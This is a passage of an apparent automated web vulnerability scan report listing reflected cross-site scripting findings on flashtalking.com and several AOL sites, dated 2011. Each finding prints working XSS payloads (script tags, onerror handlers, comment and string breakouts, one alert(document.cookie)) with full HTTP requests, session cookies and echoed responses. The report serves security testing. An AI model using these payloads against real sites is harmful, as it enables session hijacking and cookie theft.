Via: 1.1 mdw061001 (MII-APC/1.6)
var ftGUID_97126="11327F503D579E"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... ;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=8b507"-alert(1)-"1359c52bda6&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339"; var ftKeyword_97126=""; var ftSegment_97126="";
The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b515f"-alert(1)-"d141519c932 was submitted in the fty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=b515f"-alert(1)-"d141519c932&ftadz=&ftscw=&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:38 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11328D1137525B";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:38 GMT
Content-Length: 758
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061003 (MII-APC/1.6)
var ftGUID_97126="11328D1137525B"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... g=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=b515f"-alert(1)-"d141519c932&ftadz=&ftscw=&cachebuster=710415.5826382339"; var ftKeyword_97126=""; var ftSegment_97126="";
1.196. http://servedby.flashtalking.com/imp/3/14886 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://servedby.flashtalking.com
Path: /imp/3/14886
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9548d"-alert(1)-"1c425036cc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339&9548d"-alert(1)-"1c425036cc1=1 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:29 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1132056B5C07B9";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:49:29 GMT
Cache-Control: no-cache, no-store
Content-Length: 761
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 mdw061003 (MII-APC/1.6)
var ftGUID_97126="1132056B5C07B9"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... 3575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339&9548d"-alert(1)-"1c425036cc1=1"; var ftKeyword_97126=""; var ftSegment_97126="";
1.197. http://smallbusiness.aol.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://smallbusiness.aol.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 998a2"><script>alert(1)</script>9cd08062e59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?998a2"><script>alert(1)</script>9cd08062e59=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7d53"><img%20src%3da%20onerror%3dalert(1)>d069487f7e was submitted in the REST URL parameter 3. This input was echoed as c7d53"><img src=a onerror=alert(1)>d069487f7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /2011/02/01c7d53"><img%20src%3da%20onerror%3dalert(1)>d069487f7e/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.199. http://smallbusiness.aol.com/2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53b6e"><script>alert(1)</script>a03fac11be7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/?53b6e"><script>alert(1)</script>a03fac11be7=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4f14"%20a%3db%202dd62ea6f1a was submitted in the REST URL parameter 3. This input was echoed as e4f14" a=b 2dd62ea6f1a in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2011/02/02e4f14"%20a%3db%202dd62ea6f1a/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.201. http://smallbusiness.aol.com/2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c220"><script>alert(1)</script>01c18185ad3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/?9c220"><script>alert(1)</script>01c18185ad3=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8709"a%3d"b"648ab0da27 was submitted in the REST URL parameter 3. This input was echoed as c8709"a="b"648ab0da27 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2011/02/05c8709"a%3d"b"648ab0da27/make-friends/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <input type="hidden" name="referer" value="http://smallbusiness.aol.com:1080/2011/02/05c8709"a="b"648ab0da27/make-friends/"> ...[SNIP]...
1.203. http://smallbusiness.aol.com/2011/02/05/make-friends/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://smallbusiness.aol.com
Path: /2011/02/05/make-friends/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97c25"><script>alert(1)</script>7fcfb2a62be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/05/make-friends/?97c25"><script>alert(1)</script>7fcfb2a62be=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://smallbusiness.aol.com/2011/02/05/make-friends/?97c25"><script>alert(1)</script>7fcfb2a62be=1"/> ...[SNIP]...
1.204. http://smallbusiness.aol.com/2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae3ca"><script>alert(1)</script>e8a6ea52003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/?ae3ca"><script>alert(1)</script>e8a6ea52003=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa121"a%3d"b"4a36e3efe23 was submitted in the REST URL parameter 3. This input was echoed as fa121"a="b"4a36e3efe23 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2011/02/06fa121"a%3d"b"4a36e3efe23/enjoy-the-ride/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <input type="hidden" name="referer" value="http://smallbusiness.aol.com:1080/2011/02/06fa121"a="b"4a36e3efe23/enjoy-the-ride/"> ...[SNIP]...
1.206. http://smallbusiness.aol.com/2011/02/06/enjoy-the-ride/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://smallbusiness.aol.com
Path: /2011/02/06/enjoy-the-ride/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3029a"><script>alert(1)</script>5a9c8cbf6a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/enjoy-the-ride/?3029a"><script>alert(1)</script>5a9c8cbf6a4=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c1c"><a>d5dbf42efbb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/advertising-and-marketinga5c1c"><a>d5dbf42efbb/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.208. http://smallbusiness.aol.com/category/advertising-and-marketing/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://smallbusiness.aol.com
Path: /category/advertising-and-marketing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10cba"><script>alert(1)</script>fedb4407f14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/advertising-and-marketing/?10cba"><script>alert(1)</script>fedb4407f14=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 174a7"><a>518d741443b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/money174a7"><a>518d741443b/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.210. http://smallbusiness.aol.com/category/money/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://smallbusiness.aol.com
Path: /category/money/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8fe7"><script>alert(1)</script>94d4958289d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/money/?e8fe7"><script>alert(1)</script>94d4958289d=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6b07"><a>43900fd15f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/starting-a-businessd6b07"><a>43900fd15f2/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.212. http://smallbusiness.aol.com/category/starting-a-business/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://smallbusiness.aol.com
Path: /category/starting-a-business/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b06dc"><script>alert(1)</script>c0f94426d7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/starting-a-business/?b06dc"><script>alert(1)</script>c0f94426d7b=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3ed00--><img%20src%3da%20onerror%3dalert(1)>6108271377c was submitted in the REST URL parameter 1. This input was echoed as 3ed00--><img src=a onerror=alert(1)>6108271377c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /a3ed00--><img%20src%3da%20onerror%3dalert(1)>6108271377c HTTP/1.1
Host: sports.aol.com
Proxy-Connection: keep-alive
Referer: http://sports.aol.com/ee570--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E8e55749f635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2393099708.3390197069.4049274368; bandType=broadband; s_pers=%20s_getnr%3D1297023681276-Repeat%7C1360095681276%3B%20s_nrgvo%3DRepeat%7C1360095681299%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.0 404 Not Found
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:20:49 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
ntCoent-Length: 24927
Connection: close
Content-Length: 24927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm29 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <!--req:101x1_1.us.sports20.a3ed00--><img src=a onerror=alert(1)>6108271377c.broadband ad:none (recursion blocked at default(mn=0)) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96673"-alert(1)-"6a5552da2b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a96673"-alert(1)-"6a5552da2b6 HTTP/1.1
Host: sports.aol.com
Proxy-Connection: keep-alive
Referer: http://sports.aol.com/ee570--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E8e55749f635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2393099708.3390197069.4049274368; bandType=broadband; s_pers=%20s_getnr%3D1297023681276-Repeat%7C1360095681276%3B%20s_nrgvo%3DRepeat%7C1360095681299%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.0 404 Not Found
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:20:48 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
ntCoent-Length: 24818
Connection: close
Content-Length: 24818
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld30 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <!-- s_265.mmxgo=true; s_265.pageName="Page Not Found"; s_265.channel="us.sports"; s_265.trackExternalLinks="true"; s_265.prop1="a96673"-alert(1)-"6a5552da2b6"; s_265.pfxID="spr"; s_265.disablepihost=false; s_265.prop12="http://sports.aol.com/a96673\"-alert(1)-\"6a5552da2b6"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)d ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87de0</script><script>alert(1)</script>d5d06ef2b0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico87de0</script><script>alert(1)</script>d5d06ef2b0a HTTP/1.1
Host: sports.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2334838204.3457568077.2591753984; bandType=broadband; s_pers=%20s_getnr%3D1297023600701-Repeat%7C1360095600701%3B%20s_nrgvo%3DRepeat%7C1360095600703%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.0 404 Not Found
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:29 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
ntCoent-Length: 24922
Connection: close
Content-Length: 24922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm02 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <"; s_265.pfxID="spr"; s_265.disablepihost=false; s_265.prop12="http://sports.aol.com/favicon.ico87de0</script><script>alert(1)</script>d5d06ef2b0a"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ee570--><img%20src%3da%20onerror%3dalert(1)>8e55749f635 was submitted in the REST URL parameter 1. This input was echoed as ee570--><img src=a onerror=alert(1)>8e55749f635 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /ee570--><img%20src%3da%20onerror%3dalert(1)>8e55749f635 HTTP/1.1
Host: sports.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2334838204.3457568077.2591753984; bandType=broadband; s_pers=%20s_getnr%3D1297023600701-Repeat%7C1360095600701%3B%20s_nrgvo%3DRepeat%7C1360095600703%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.0 404 Not Found
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:33 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
ntCoent-Length: 24922
Connection: close
Content-Length: 24922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld29 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <!--req:101x1_1.us.sports20.ee570--><img src=a onerror=alert(1)>8e55749f635.broadband ad:none (recursion blocked at default(mn=0)) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d396"-alert(1)-"2e6570a7b85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
